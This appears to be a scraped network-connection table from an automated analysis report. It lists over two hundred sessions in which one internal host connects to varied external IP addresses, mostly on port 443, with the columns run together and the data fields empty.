                                                12184192.168.2.233719257.64.67.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12185192.168.2.235649868.189.159.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12186192.168.2.2338630139.191.225.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12187192.168.2.2336574190.72.178.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12188192.168.2.235182660.125.8.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12189192.168.2.2336210182.132.174.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12190192.168.2.235712273.184.183.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12191192.168.2.2356372173.245.21.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12192192.168.2.235197240.193.113.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12193192.168.2.2350632172.207.71.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12194192.168.2.2359688119.10.216.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12195192.168.2.2343974117.59.151.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12196192.168.2.2358792196.233.195.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12197192.168.2.233603051.165.209.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12198192.168.2.235089696.32.112.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12199192.168.2.2337324203.79.124.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12200192.168.2.2360788199.109.58.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12201192.168.2.2346050201.215.168.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12202192.168.2.2347448149.48.98.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12203192.168.2.2357110178.225.30.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12204192.168.2.2350784157.64.221.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12205192.168.2.234032658.34.139.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12206192.168.2.233796039.255.4.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12207192.168.2.2354154222.52.232.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12208192.168.2.2341032140.210.186.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12209192.168.2.2352040121.241.216.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12210192.168.2.2342194162.217.16.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12211192.168.2.2338254158.155.68.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12212192.168.2.2346458121.64.225.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12213192.168.2.234855053.140.154.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12214192.168.2.2344086119.133.219.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12215192.168.2.2340336130.37.183.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12216192.168.2.233537052.158.238.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12217192.168.2.235184492.6.20.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12218192.168.2.2335864220.226.60.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12219192.168.2.2348024104.17.56.18080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12220192.168.2.235574240.169.42.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12221192.168.2.2342572111.219.46.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12222192.168.2.2355132115.253.112.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12223192.168.2.2347416200.90.54.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12224192.168.2.235757489.11.166.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12225192.168.2.2337766194.225.98.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12226192.168.2.233309286.55.184.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12227192.168.2.234950438.130.100.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12228192.168.2.2346118199.249.245.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12229192.168.2.2339826125.140.28.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12230192.168.2.2355712109.202.165.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12231192.168.2.2350534122.174.194.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12232192.168.2.2335316170.35.41.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12233192.168.2.2352470155.251.42.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12234192.168.2.2344682110.180.134.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12235192.168.2.235624244.41.101.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12236192.168.2.2358114164.34.140.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12237192.168.2.233352083.70.109.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12238192.168.2.235509627.60.225.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12239192.168.2.2342974217.135.64.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12240192.168.2.235553461.226.106.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12241192.168.2.23458465.117.120.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12242192.168.2.2346598176.241.242.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12243192.168.2.235417039.44.237.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12244192.168.2.233577286.230.233.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12245192.168.2.2360054121.178.173.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12246192.168.2.2351638111.51.6.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12247192.168.2.235400473.140.98.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12248192.168.2.234716084.111.187.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12249192.168.2.235465861.118.187.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12250192.168.2.23405824.247.98.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12251192.168.2.2358342184.187.107.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12252192.168.2.2353744204.186.170.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12253192.168.2.2335714126.142.136.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12254192.168.2.234092285.5.214.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12255192.168.2.2360698116.118.108.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12256192.168.2.233318427.16.152.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12257192.168.2.235593081.27.214.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12258192.168.2.2344508217.100.191.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12259192.168.2.2352304146.150.244.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12260192.168.2.2356668171.154.189.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12261192.168.2.2337988133.106.177.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12262192.168.2.234139285.24.25.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12263192.168.2.2360412202.77.225.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12264192.168.2.2348130116.194.240.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12265192.168.2.235296014.255.55.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12266192.168.2.235940874.109.8.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12267192.168.2.2338336179.93.90.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12268192.168.2.235361058.7.27.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12269192.168.2.2352450108.178.166.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12270192.168.2.234932486.125.4.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12271192.168.2.233431079.227.0.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12272192.168.2.2358788114.132.182.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12273192.168.2.2357516220.13.243.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12274192.168.2.235682448.77.178.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12275192.168.2.234870892.192.73.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12276192.168.2.2350402195.146.140.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12277192.168.2.2346196221.172.211.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12278192.168.2.2338768139.62.217.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12279192.168.2.2360898147.21.233.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12280192.168.2.2345638124.78.230.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12281192.168.2.2338524206.172.22.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12282192.168.2.2345520159.4.139.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12283192.168.2.2357558184.5.244.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12284192.168.2.2356938119.84.184.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12285192.168.2.2351682149.214.127.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12286192.168.2.233862627.232.246.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12287192.168.2.2360924159.169.49.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12288192.168.2.234233497.88.235.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12289192.168.2.235474265.55.71.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12290192.168.2.234876034.138.24.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12291192.168.2.235564851.80.139.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12292192.168.2.2344810179.161.86.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12293192.168.2.2339694108.96.228.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12294192.168.2.2357092166.38.50.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12295192.168.2.2358638133.41.135.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12296192.168.2.2342046143.219.93.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12297192.168.2.235319046.128.133.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12298192.168.2.234911645.90.245.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12299192.168.2.235672299.238.134.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12300192.168.2.2339614111.62.169.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12301192.168.2.2343674153.32.157.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12302192.168.2.233344485.201.154.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12303192.168.2.235748641.205.255.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12304192.168.2.2356924102.221.215.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12305192.168.2.2352196182.205.8.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12306192.168.2.2357972113.48.75.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12307192.168.2.2356400153.100.152.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12308192.168.2.2341610110.139.100.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12309192.168.2.2335768171.93.237.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12310192.168.2.233654061.183.25.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12311192.168.2.234524869.175.194.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12312192.168.2.2340192158.141.58.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12313192.168.2.2359850130.85.158.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12314192.168.2.2343456205.57.250.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12315192.168.2.234609078.156.209.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12316192.168.2.2350356129.193.81.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12317192.168.2.235206079.9.226.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12318192.168.2.233559841.98.213.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12319192.168.2.233638654.4.2.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12320192.168.2.233544624.176.132.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12321192.168.2.2336778173.86.6.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12322192.168.2.2338758108.27.132.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12323192.168.2.233500653.114.198.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12324192.168.2.2338614168.158.15.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12325192.168.2.234256637.92.204.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12326192.168.2.233648846.107.28.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12327192.168.2.235964461.105.32.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12328192.168.2.234515241.102.245.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12329192.168.2.2347022100.239.152.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12330192.168.2.2359732168.161.73.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12331192.168.2.2337150200.82.222.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12332192.168.2.2337570166.12.226.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12333192.168.2.2358340102.49.113.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12334192.168.2.2333384139.196.29.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12335192.168.2.234398832.99.209.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12336192.168.2.234611412.82.157.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12337192.168.2.2339900137.39.30.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12338192.168.2.2337702205.212.154.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12339192.168.2.235653878.243.58.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12340192.168.2.2351238102.36.19.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12341192.168.2.2358612181.163.128.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12342192.168.2.2347544104.24.69.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12343192.168.2.2335456159.10.154.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12344192.168.2.2337494219.28.215.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12345192.168.2.233884094.123.162.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12346192.168.2.233756819.205.76.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12347192.168.2.234056031.67.9.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12348192.168.2.235541662.9.119.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12349192.168.2.2357728124.113.183.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12350192.168.2.2355552177.216.237.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12351192.168.2.235585434.135.152.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12352192.168.2.2348412143.22.157.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12353192.168.2.234308289.249.41.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12354192.168.2.235020651.100.168.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12355192.168.2.2355094205.203.92.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12356192.168.2.234976847.45.150.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12357192.168.2.2351746103.162.26.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12358192.168.2.235999257.26.158.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12359192.168.2.2352700145.131.140.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12360192.168.2.2358710151.87.167.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12361192.168.2.234790480.165.5.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12362192.168.2.23382208.182.169.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12363192.168.2.2334572111.35.177.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12364192.168.2.2349392155.89.60.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12365192.168.2.234767037.120.127.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12366192.168.2.2347442134.134.159.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12367192.168.2.233553463.216.184.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12368192.168.2.2355124207.201.38.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12369192.168.2.233463437.34.188.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12370192.168.2.2357472108.67.9.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12371192.168.2.234084664.227.73.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12372192.168.2.2352688192.151.157.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12373192.168.2.234039818.60.53.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12374192.168.2.2358776149.129.201.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12375192.168.2.2348870163.166.112.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12376192.168.2.233818277.2.144.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12377192.168.2.2333064144.221.227.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12378192.168.2.233429442.144.155.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12379192.168.2.2357228119.112.99.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12380192.168.2.235791063.85.161.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12381192.168.2.2340916142.108.20.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12382192.168.2.2352232150.21.45.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12383192.168.2.234820835.18.4.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12384192.168.2.2350756129.10.39.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12385192.168.2.2358324103.113.255.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12386192.168.2.235266017.102.74.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12387192.168.2.2358822222.201.157.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12388192.168.2.23604881.98.202.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12389192.168.2.2340608220.234.32.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12390192.168.2.234329466.27.175.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12391192.168.2.233468898.171.92.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12392192.168.2.234171891.245.251.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12393192.168.2.2341182121.117.162.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12394192.168.2.2335814223.129.4.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12395192.168.2.235733253.52.91.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12396192.168.2.2349388219.239.225.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12397192.168.2.233538889.89.251.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12398192.168.2.236000262.164.135.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12399192.168.2.234219088.44.230.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12400192.168.2.2333824201.47.214.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12401192.168.2.2338704216.42.62.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12402192.168.2.2334508102.68.62.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12403192.168.2.2353994177.165.214.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12404192.168.2.2356306173.181.177.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12405192.168.2.2336290112.89.97.249443
                                                TimestampBytes transferredDirectionData


